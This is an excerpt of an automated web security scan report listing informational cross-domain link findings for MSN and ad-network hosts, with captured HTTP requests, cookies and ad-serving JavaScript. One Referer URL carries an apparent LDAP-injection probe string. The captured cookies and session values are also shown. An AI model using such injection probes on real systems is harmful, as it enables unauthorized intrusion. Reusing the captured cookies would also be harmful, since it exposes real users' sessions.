The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:42 GMT
Content-Length: 2781


//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_553650227() {var adCode_553650227=new Array();adCode_553650227.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&amp;&amp;PID=8013955&amp;UIT=G&amp;TargetID=8303500&amp;AN=553650227&amp;PG=INV4QC&amp;ASID=795218be0a4e4bedbb142065adf1af55&destination=;ord=553650227?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_553650227.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

22.51. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2710
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8016549-T28253486-C26000000000150232
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:44 GMT
Content-Length: 2710


//<![CDATA[
function getRADIds() { return{"adid":"26000000000150232","pid":"8016549","targetid":"28253486"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_420169787() {var adCode_420169787=new Array();adCode_420169787.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&amp;&amp;PID=8016549&amp;UIT=G&amp;TargetID=28253486&amp;AN=420169787&amp;PG=INVPC3&amp;ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787?" WIDTH=300 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_420169787.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3973.MSN/B4412732.159;abr=!ie;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.
...[SNIP]...

22.52. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=860849269?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=860849269?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.53. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:27:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1528833724?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1528833724?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.54. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=72207368?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=72207368?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.55. http://ccc01.opinionlab.com/o.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ccc01.opinionlab.com
Path:   /o.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14859
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQTCBBDR=KLBDJLOBBPPOPIONDAELIJLO; path=/
Date: Sat, 29 Jan 2011 23:45:32 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<title>Comment Card</title><script language="javascript" type="tex
...[SNIP]...
<td width="50%" valign="top" class="text"><a target="OpinionLab" href="http://go.microsoft.com/fwlink/?LinkID=74170" title="">MSN Privacy Policy</a>
...[SNIP]...

22.56. http://cdn.lib.newsvine.com/_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.lib.newsvine.com
Path:   /_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js?v=23247 HTTP/1.1
Host: cdn.lib.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 28 Jan 2011 21:50:14 GMT
ETag: "2e386a3-16f3c-49aef0d123180"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=1309
Expires: Sun, 30 Jan 2011 01:39:28 GMT
Date: Sun, 30 Jan 2011 01:17:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 94012

/*v2643: 2011-01-28T13:50:14*/
if(typeof Pierre=="undefined"){var Pierre={}}else{}Pierre.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=Pierre;for(B=(D
...[SNIP]...
<div id="digg-widget-1275955318096"><a href="http://digg.com/search?s=msnbc.redacted">See more msnbc.redacted stories on Digg.com</a>
...[SNIP]...
book.net/en_US/all.js";document.getElementById("fb-root").appendChild(C)};this.buildPanel=function(){var B=this.wetbar.articleData;var E=$_CE("div",{className:"col1_5"},this.panelElement);E.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Ftodayshow%3Fref%3Dts&amp;width=230&amp;connections=0&amp;stream=false&amp;header=false&amp;height=70" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:70px;bottom-border:1px solid #ccc;" allowTransparency="true"></iframe>';var D=$_CE("div",{className:"col1_5"},this.panelElement);D.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FTODAYs-Kitchen%2F363939277982%3Fref%3Dts&amp;width=230&amp;connections=0&amp;stream=false&amp;header=false&amp;height=70" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:70px;" allowTransparency="true"></iframe>';var C=$_CE("div",{className:"col1_5"},this.panelElement);C.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FToday-Money%2F152222541478430&amp;width=230&amp;connections=0&amp;stream=false&amp;header=false&amp;height=68" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:68px;" allowTransparency="true"></iframe>';var A=$_CE("div",{className:"col1_5"},this.panelElement);A.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FLifeIncBlog&amp;width=220&amp;colorscheme=light&amp;connections=00&amp;stream=false&amp;header=false&amp;height=60" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:220px; height:60px;" allowTransparency="true"></iframe>
...[SNIP]...
<a title="Add to Windows Live" href="http://my.live.com/?add='+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="Add to Windows Live" src="http://msnbcmedia.redacted/i/msnbc/Components/ColorBoxes/Styles/ColorBoxImages_GlobalOnlyPlease/wl.gif"/></a>';$_CE("span",{className:"myyahoo"},B).innerHTML='<a title="Add to My Yahoo!" href="http://us.rd.yahoo.com/my/atm/MSNBC/Top20News/*http://add.my.yahoo.com/rss?url='+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="Add to My Yahoo!" src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif"/></a>';$_CE("span",{className:"mymsn"},B).innerHTML='<a title="Add to My MSN" href="http://my.redacted/addtomymsn.armx?id=rss&amp;ut='+D[i].getAttribute("href")+'" target="_blank"><img border="0" src="http://tk2.stc.s-msn.com/br/mymsn/logo/addtomymsn.us.png" alt="Add to My MSN"/></a>';$_CE("span",{className:"bloglines"},B).innerHTML='<a title="Subscribe with Bloglines" href="http://www.bloglines.com/sub/'+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="Subscribe with Bloglines" src="http://www.bloglines.com/images/sub_modern11.gif"/></a>
...[SNIP]...
<a title="XML" href="'+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="XML" src="http://msnbcmedia.redacted/i/msnbc/Components/ColorBoxes/Styles/ColorBoxImages_GlobalOnlyPlease/xmlIcon.gif"/></a>
...[SNIP]...
dPanel=function(){plib.Dom.createElement("div",{className:"col1"},this.panelElement).innerHTML="&nbsp;";div=plib.Dom.createElement("div",{className:"col4 scoreboard"},this.panelElement);div.innerHTML='<embed height="72" align="top" width="582" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" allowscriptaccess="always" seamlesstabbing="true" allowfullscreen="false" wmode="transparent" devicefont="false" menu="false" id="fl25940053" name="fl25940053" mayscript="" salign="tl" scale="noborder" quality="Best" bgcolor="#ffffff" loop="true" play="true" swliveconnect="TRUE" src="http://msnbcmedia.redacted/i/NBCSports/SiteManagement/Scoreboards/horiz/scoreboard_horiz.swf?domain=nbcsports.msnbc.com&amp;">';plib.Dom.createElement("div",{className:"col1"},this.panelElement).innerHTML="&nbsp;"}});Pierre.widgets.wetbar.Tracker=function(){Pierre.widgets.wetbar.Control.superclass.constructor.call(this)};Pier
...[SNIP]...
etSent.call(A,E,D)}})})};this.handleAuthComplete=function(A){this.handleTwitterUser(A.currentUser)};this.handleTwitterUser=function(A){if(A){var B=A.data("screen_name");this.usernameSpan.innerHTML='as <a target="twitter" href="http://twitter.com/'+B+'">@'+A.data("screen_name")+"</a>
...[SNIP]...
</a>').replace(/@+([_A-Za-z0-9-]+)/ig,'<a href="http://twitter.com/$1" target="_blank">@$1</a>').replace(/#+([_A-Za-z0-9-]+)/ig,'<a href="http://search.twitter.com/search?q=$1" target="_blank">#$1</a>
...[SNIP]...
</div>');var D="http://twitter.com/status/user_timeline/"+C+".json?count=1&callback=?";$.getJSON(D,function(F){E=E(F[0].created_at);E='<a href="http://twitter.com/'+C+"/status/"+F[0].id+'">'+E+"</a>";$("#"+C+"_wetbar .username").append("@"+C);$("#"+C+"_wetbar .tweet").append(A(F[0].text));$("#"+C+"_wetbar .tweetTime").append(E);$("#"+C+"_wetbar .followTweets").append('<a href="http://twitter.com/'+C+'">Follow @'+C+" on Twitter</a>
...[SNIP]...
el.call(this)};this.buildPanel=function(){var K=plib.Dom.createElement("div",{className:"col1_5 icons"},this.panelElement);var C=plib.Dom.createElement("div",{className:"whatsnew_image"},K).innerHTML='<img alt="Think big" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_1.png" width="99" height="62" border="0" />';var I=plib.Dom.createElement("div",{className:"whatsnew_text"},K).innerHTML="<h3>
...[SNIP]...
er photos. Bigger text. Bigger stories.";var E=plib.Dom.createElement("div",{className:"col1_5 access"},this.panelElement);var H=plib.Dom.createElement("div",{className:"whatsnew_image"},E).innerHTML='<img alt="Zoom out" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_2.png" width="51" height="67" border="0" />';var F=plib.Dom.createElement("div",{className:"whatsnew_text"},E).innerHTML="<h3>
...[SNIP]...
down for a dashboard view of the news.";var B=plib.Dom.createElement("div",{className:"col1_5 sharing"},this.panelElement);var G=plib.Dom.createElement("div",{className:"whatsnew_image"},B).innerHTML='<img alt="Share more" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_3.png" width="78" height="73" border="0" />';var J=plib.Dom.createElement("div",{className:"whatsnew_text"},B).innerHTML="<h3>
...[SNIP]...

22.57. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&cver=1
Date: Sun, 30 Jan 2011 01:29:45 GMT
Content-Type: text/html; charset=UTF-8
